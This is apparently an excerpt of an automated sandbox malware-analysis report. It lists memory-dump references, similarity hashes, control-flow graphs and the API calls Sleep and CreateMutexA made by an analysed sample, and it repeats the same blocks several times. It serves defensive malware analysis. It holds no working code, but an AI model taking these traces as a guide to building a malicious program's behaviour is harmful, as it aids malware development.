                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: d7dc9f6a717c6e9273746b08e6bd7a779de3696fbe7767daed3bb73389cdf7f4
                                                                                                                                                                • Instruction ID: b94c9258cd4ea3125fa54a4178d71b148909f7a997f7f50be75bc8307c724658
                                                                                                                                                                • Opcode Fuzzy Hash: d7dc9f6a717c6e9273746b08e6bd7a779de3696fbe7767daed3bb73389cdf7f4
                                                                                                                                                                • Instruction Fuzzy Hash: C0315B317102049BEB18EBB8DD89BADB7A2DF87314F20421DE0159B3D5C7769981C722

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1553 aa1ae-aa1ce 1557 aa1fc-aa218 1553->1557 1558 aa1d0-aa1dc 1553->1558 1559 aa21a-aa226 1557->1559 1560 aa246-aa265 1557->1560 1561 aa1de-aa1ec 1558->1561 1562 aa1f2-aa1f9 call bd663 1558->1562 1563 aa228-aa236 1559->1563 1564 aa23c-aa243 call bd663 1559->1564 1565 aa293-aa916 call b80c0 1560->1565 1566 aa267-aa273 1560->1566 1561->1562 1567 aa935 1561->1567 1562->1557 1563->1564 1563->1567 1564->1560 1573 aa289-aa290 call bd663 1566->1573 1574 aa275-aa283 1566->1574 1569 aa953-aa994 Sleep CreateMutexA 1567->1569 1570 aa935 call d6c6a 1567->1570 1582 aa996-aa998 1569->1582 1583 aa9a7-aa9a8 1569->1583 1570->1569 1573->1565 1574->1567 1574->1573 1582->1583 1585 aa99a-aa9a5 1582->1585 1585->1583
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: eebd2563e7fac7f1508b36d938be5c8f0dd2e6aacb44ee2966d0bdc7b4d93bc8
                                                                                                                                                                • Instruction ID: 900f6f6dd5b5b48b49747a3930cd864848c09aebf8203bee7a9ee53d231cfd80
                                                                                                                                                                • Opcode Fuzzy Hash: eebd2563e7fac7f1508b36d938be5c8f0dd2e6aacb44ee2966d0bdc7b4d93bc8
                                                                                                                                                                • Instruction Fuzzy Hash: DD3116317002049FFB18ABACDC89BADB7A6EB87310F24461DE014AB2D5D7769985C722

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1587 aa418-aa438 1591 aa43a-aa446 1587->1591 1592 aa466-aa482 1587->1592 1593 aa448-aa456 1591->1593 1594 aa45c-aa463 call bd663 1591->1594 1595 aa4b0-aa4cf 1592->1595 1596 aa484-aa490 1592->1596 1593->1594 1597 aa93f-aa994 call d6c6a * 4 Sleep CreateMutexA 1593->1597 1594->1592 1601 aa4fd-aa916 call b80c0 1595->1601 1602 aa4d1-aa4dd 1595->1602 1599 aa492-aa4a0 1596->1599 1600 aa4a6-aa4ad call bd663 1596->1600 1623 aa996-aa998 1597->1623 1624 aa9a7-aa9a8 1597->1624 1599->1597 1599->1600 1600->1595 1607 aa4df-aa4ed 1602->1607 1608 aa4f3-aa4fa call bd663 1602->1608 1607->1597 1607->1608 1608->1601 1623->1624 1625 aa99a-aa9a5 1623->1625 1625->1624
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 4cd974b2ae0e53fd42f6b2b655d6115bdca173f803e0c5d83172e615c9792ca2
                                                                                                                                                                • Instruction ID: 4e54bcc1a7cd35e978c061cd6df762633273cdfef984caef232949809fe7a3ea
                                                                                                                                                                • Opcode Fuzzy Hash: 4cd974b2ae0e53fd42f6b2b655d6115bdca173f803e0c5d83172e615c9792ca2
                                                                                                                                                                • Instruction Fuzzy Hash: 09312A31B102049BEB18ABF8D889BADB765DFC7314F204219F0159B3D6D7759984C762

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 1627 aa54d-aa56d 1631 aa59b-aa5b7 1627->1631 1632 aa56f-aa57b 1627->1632 1635 aa5b9-aa5c5 1631->1635 1636 aa5e5-aa604 1631->1636 1633 aa57d-aa58b 1632->1633 1634 aa591-aa598 call bd663 1632->1634 1633->1634 1639 aa944-aa994 call d6c6a * 3 Sleep CreateMutexA 1633->1639 1634->1631 1641 aa5db-aa5e2 call bd663 1635->1641 1642 aa5c7-aa5d5 1635->1642 1637 aa632-aa916 call b80c0 1636->1637 1638 aa606-aa612 1636->1638 1643 aa628-aa62f call bd663 1638->1643 1644 aa614-aa622 1638->1644 1661 aa996-aa998 1639->1661 1662 aa9a7-aa9a8 1639->1662 1641->1636 1642->1639 1642->1641 1643->1637 1644->1639 1644->1643 1661->1662 1663 aa99a-aa9a5 1661->1663 1663->1662
                                                                                                                                                                APIs
                                                                                                                                                                • Sleep.KERNEL32(00000064), ref: 000AA963
                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,00103254), ref: 000AA981
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000000.00000002.2182917529.00000000000A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 000A0000, based on PE: true
                                                                                                                                                                • Associated: 00000000.00000002.2182669159.00000000000A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2182917529.0000000000102000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183000574.0000000000109000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183023491.000000000010B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183049504.0000000000117000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183174403.000000000026E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183198375.0000000000270000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000282000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183224746.0000000000290000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183272831.0000000000293000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183296339.0000000000294000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183317982.0000000000295000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183338775.0000000000296000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183359688.0000000000297000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183383671.0000000000299000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183410807.00000000002A8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183441616.00000000002A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183484425.00000000002BF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183508664.00000000002C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183530942.00000000002C3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183571136.00000000002D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183600749.00000000002DF000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183626520.00000000002E0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183651042.00000000002E9000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183675519.00000000002ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183715487.00000000002F5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183760013.00000000002FE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183798599.000000000030E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183816602.000000000030F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183834127.0000000000316000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183854335.000000000031B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183873864.0000000000322000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183903490.0000000000326000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183931663.000000000032E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183967335.0000000000332000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2183994600.000000000033F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184019272.0000000000340000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184058705.000000000034D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000034E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184080081.000000000036D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184134803.0000000000384000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184153740.0000000000385000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184177499.000000000039B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184195693.000000000039C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184216554.00000000003A3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184258734.00000000003A5000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184299165.00000000003B3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                • Associated: 00000000.00000002.2184335891.00000000003B4000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_0_2_a0000_random.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CreateMutexSleep
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1464230837-0
                                                                                                                                                                • Opcode ID: 7bc51a7cb7cc6e6653816e0b1e124da7d19c1c9160da9c7ad3ee94cafefd37a7
                                                                                                                                                                • Instruction ID: 7369584b607697d59b25cec3b5e5748d7c5778e36264ea38f1840e2e73894672
                                                                                                                                                                • Opcode Fuzzy Hash: 7bc51a7cb7cc6e6653816e0b1e124da7d19c1c9160da9c7ad3ee94cafefd37a7
                                                                                                                                                                • Instruction Fuzzy Hash: 1B314C31B002048BEB18EBF8DC897ADB762DF87314F244619E0159B3D2C7759981C726

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
